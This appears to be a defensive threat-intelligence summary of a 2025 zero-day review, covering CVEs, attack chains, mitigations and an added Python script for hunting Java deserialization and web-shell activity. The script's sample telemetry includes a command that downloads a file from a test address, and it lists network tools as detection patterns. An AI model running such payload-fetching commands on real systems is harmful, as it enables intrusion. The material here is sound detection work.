Look What You Made Us Patch: 2025 Zero-Days in Review
Google Threat Intelligence Group's 2025 review highlights 90 exploited zero-day vulnerabilities, with a significant shift toward enterprise infrastructure and edge devices. Commercial surveillance vendors outpaced state-sponsored actors in zero-day usage, while financially motivated groups and PRC-nexus espionage operators continued to heavily leverage zero-days for initial access, persistence, and data theft.
Authors: Casey Charrier, James Sadowski, Zander Work, Clement Lecigne, Benoît Sevens, Fred Plan
Source:
Mandiant
Key Takeaways
- 90 zero-day vulnerabilities were exploited in 2025, showing a stabilization trend compared to previous years.
- Enterprise technologies accounted for 48% of zero-days, marking an all-time high and highlighting the risk to edge devices and interconnected platforms.
- Commercial surveillance vendors (CSVs) surpassed state-sponsored groups in attributed zero-day exploitation for the first time.
- Financially motivated threat groups exploited 9 zero-days, nearly matching their previous high, often leading to ransomware deployment.
- Mobile zero-days rebounded to 15, while browser-based exploitation fell to historical lows due to improved hardening.
Affected Systems
- Enterprise software and edge devices (routers, switches, security appliances)
- Desktop Operating Systems (Windows, macOS, Linux)
- Mobile Operating Systems (Android, iOS)
- Web Browsers (Chrome, Safari, Edge)
- SonicWall SMA 1000 series
- Oracle E-Business Suite (EBS)
- Samsung devices (Quram library / com.samsung.ipservice)
Vulnerabilities (CVEs)
- CVE-2025-21590
- CVE-2025-0282
- CVE-2025-61882
- CVE-2025-61884
- CVE-2025-8088
- CVE-2025-2783
- CVE-2025-48543
- CVE-2025-27038
- CVE-2024-0519
- CVE-2023-33106
- CVE-2025-6558
- CVE-2025-5419
- CVE-2025-38352
- CVE-2025-14174
- CVE-2025-23006
- CVE-2025-40602
- CVE-2025-21042
- CVE-2025-21043
- CVE-2025-43300
- CVE-2021-37973
- CVE-2023-6345
- CVE-2023-2136
Attack Chain
Threat actors use zero-day vulnerabilities for initial access, often against edge devices such as SonicWall SMA 1000 appliances (CVE-2025-23006, CVE-2025-40602) or enterprise software such as Oracle E-Business Suite (CVE-2025-61882, CVE-2025-61884). In the SonicWall chain, the attacker reaches the appliance without valid credentials, triggers Java deserialization of untrusted data for remote code execution, and then abuses a local XML-RPC service to escalate to root. On mobile devices, the attacker delivers a malicious DNG image through a messaging app; the image is parsed automatically by system services (CVE-2025-43300 on iOS; CVE-2025-21042 and CVE-2025-21043 in the Samsung Quram library), giving remote code execution without user interaction and a path to sandbox escape.
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: No
The article provides high-level behavioral descriptions and architectural mitigation strategies, but does not include specific detection rules or queries.
Detection Engineering Assessment
- EDR Visibility: Medium. EDR is typically absent on edge devices (routers, switches, security appliances), which creates blind spots; on servers and endpoints it can still catch post-exploitation activity such as anomalous child processes or memory-corruption artifacts.
- Network Visibility: Medium. Network monitoring can flag anomalous payloads (for example Java serialized objects in traffic decrypted at a WAF or reverse proxy) or unusual traffic patterns, but exploits carried over end-to-end encrypted channels and local privilege escalations stay invisible.
- Detection Difficulty: Hard. Zero-days lack signatures by definition, and exploits against edge devices or 0-click mobile vectors leave minimal forensic footprints.
Required Log Sources
- Web Application Firewall (WAF) logs
- Application logs (Oracle EBS, SonicWall)
- Endpoint process execution logs
- Mobile device crash logs
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Web application services spawn anomalous child processes (for example a Java process running a shell, curl or wget), indicating deserialization exploitation. | Process-creation logs: Linux auditd execve records or EDR telemetry on appliances and Linux servers; Windows Event ID 4688 / Sysmon Event ID 1 where Windows hosts the web tier | Initial Access (T1190) leading to Execution (T1059.004) | Low |
| Image-parsing services (for example com.samsung.ipservice) crash or log unexpected errors, which may indicate failed memory-corruption exploit attempts against a 0-click vector. | Mobile OS crash logs / application logs | Execution (T1203) | Medium |
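The network-visibility note in the assessment above and the first row of this table reduce to the same two checks: a Java serialized object stream arriving at a web service, and a web runtime spawning an interpreter. The Python below is an added example, not code from the GTIG report or from any vendor. It runs both checks over constructed sample records (field names follow Sysmon conventions; the hosts, addresses, paths and command lines are made up), and the only fixed values it relies on are the `java.io.ObjectOutputStream` header `AC ED 00 05` and its base64 form, which always begins `rO0AB`.

```python
"""Hunting helpers for the two hypotheses in the table above.

Added example, not code from the GTIG report. All telemetry below is
constructed sample data, not captured from any real incident.
"""
import re
from dataclasses import dataclass
from typing import Optional

# java.io.ObjectOutputStream header: STREAM_MAGIC 0xACED, STREAM_VERSION 0x0005.
JAVA_SER_MAGIC = b"\xac\xed\x00\x05"
# Base64 of that header always starts with these five characters.
JAVA_SER_MAGIC_B64 = b"rO0AB"

# Web runtimes that should not be spawning interpreters.
WEB_RUNTIMES = {"java", "httpd", "apache2", "nginx", "tomcat"}
# Children that indicate command execution or payload retrieval.
INTERPRETERS = {"sh", "bash", "dash", "zsh", "ksh", "cmd", "powershell",
                "python", "python3", "perl", "curl", "wget", "nc"}


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    detail: str


def image_name(path: str) -> str:
    """Normalise a POSIX or Windows image path to a bare lower-case name."""
    name = re.split(r"[\\/]", path)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def classify_body(body: bytes) -> Optional[str]:
    """'raw' or 'base64' when the body carries a Java serialized stream header,
    else None. The header is searched for anywhere, because the object is
    usually one form field, cookie or XML element among several."""
    if JAVA_SER_MAGIC in body:
        return "raw"
    if JAVA_SER_MAGIC_B64 in body:
        return "base64"
    return None


def hunt_serialized_payloads(requests: list) -> list:
    """Network side: serialized Java objects reaching a web service from
    outside. Only works where TLS is terminated at the logging WAF/proxy."""
    findings = []
    for r in requests:
        kind = classify_body(r["body"])
        if kind:
            findings.append(Finding(r["host"], "java-serialized-input",
                                    f"{kind} stream from {r['src']} to {r['path']}"))
    return findings


def hunt_web_shell_children(events: list) -> list:
    """Endpoint side: an interpreter spawned by a web runtime. Tune by
    allow-listing known maintenance command lines, not by dropping the
    parent from WEB_RUNTIMES."""
    findings = []
    for e in events:
        parent, child = image_name(e["ParentImage"]), image_name(e["Image"])
        if parent in WEB_RUNTIMES and child in INTERPRETERS:
            findings.append(Finding(e["host"], "web-runtime-spawned-interpreter",
                                    f"{parent} -> {child}: {e['CommandLine']}"))
    return findings


# Constructed WAF/proxy records with decrypted bodies (RFC 5737 test addresses).
SAMPLE_REQUESTS = [
    {"host": "ebs-app01", "src": "203.0.113.7", "path": "/login",
     "body": b"username=jdoe&password=hunter2"},
    {"host": "sma-mgmt", "src": "203.0.113.9", "path": "/service",
     "body": b"\xac\xed\x00\x05sr\x00\x11java.util.HashMap" + b"\x00" * 16},
    {"host": "ebs-app01", "src": "198.51.100.4", "path": "/api/import",
     "body": b"state=rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==&submit=1"},
]

# Constructed process-creation events using Sysmon-style field names.
SAMPLE_PROCESS_EVENTS = [
    {"host": "sma-mgmt", "ParentImage": "/usr/lib/jvm/bin/java",
     "Image": "/bin/sh", "CommandLine": "sh -c 'id; uname -a'"},
    {"host": "ebs-app01", "ParentImage": "/u01/app/java/bin/java",
     "Image": "/usr/bin/curl", "CommandLine": "curl -s http://198.51.100.4/x -o /tmp/x"},
    {"host": "ebs-app01", "ParentImage": "/bin/bash",          # benign: shell starts Java
     "Image": "/u01/app/java/bin/java", "CommandLine": "java -jar app.jar"},
    {"host": "win-ws42", "ParentImage": "C:\\Windows\\explorer.exe",  # benign: user shell
     "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe"},
]

if __name__ == "__main__":
    for f in hunt_serialized_payloads(SAMPLE_REQUESTS) + hunt_web_shell_children(SAMPLE_PROCESS_EVENTS):
        print(f"[{f.rule}] {f.host}: {f.detail}")
```

Run it directly to print the findings: the two serialized-object requests and the two interpreter spawns, with the shell-starts-Java and user-shell events correctly ignored. The network check carries the caveat the assessment makes: it sees nothing when the exploit rides end-to-end encryption past the WAF. On the appliance itself, the process-ancestry check depends on whatever process logging the vendor exposes, since EDR is usually not an option there.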
Control Gaps
- Lack of EDR support on edge devices and security appliances
- Insufficient input validation and deserialization checks in enterprise appliances
- Lack of memory safety mitigations (PAC, BTI) in legacy C/C++ libraries on mobile devices
Key Behavioral Indicators
- Anomalous process ancestry from web services
- Unexpected Java deserialization activity
- Crashes in media parsing services
False Positive Assessment
- Low for the web-service process-ancestry hunt; Medium for the mobile crash-log hunt, where benign parser crashes are common.
Recommendations
Immediate Mitigation
- Apply vendor patches for all listed CVEs immediately.
- Isolate vulnerable systems if patches are unavailable by disabling specific services or blocking ports.
- Reboot mobile devices regularly to disrupt in-memory payloads.
Infrastructure Hardening
- Segment DMZ, firewalls, and VPNs from critical internal assets to prevent lateral movement.
- Enforce strict driver blocklists and monitor kernel-level behavior.
- Do not expose device network ports to the internet unless strictly required.
- Maintain a Software Bill of Materials (SBoM) to quickly locate affected libraries.
User Protection
- Enable Advanced Protection Mode on Android and Lockdown Mode on iOS for high-risk users.
- Use ad blockers and configure privacy sandbox settings.
- Do not click links or download attachments from unknown contacts.
Security Awareness
- Educate high-risk users on the threats of 0-click and 1-click mobile exploits.
- Establish processes for emergency out-of-band patching.
MITRE ATT&CK Mapping
- T1190 - Exploit Public-Facing Application
- T1068 - Exploitation for Privilege Escalation
- T1203 - Exploitation for Client Execution
- T1059.004 - Command and Scripting Interpreter: Unix Shell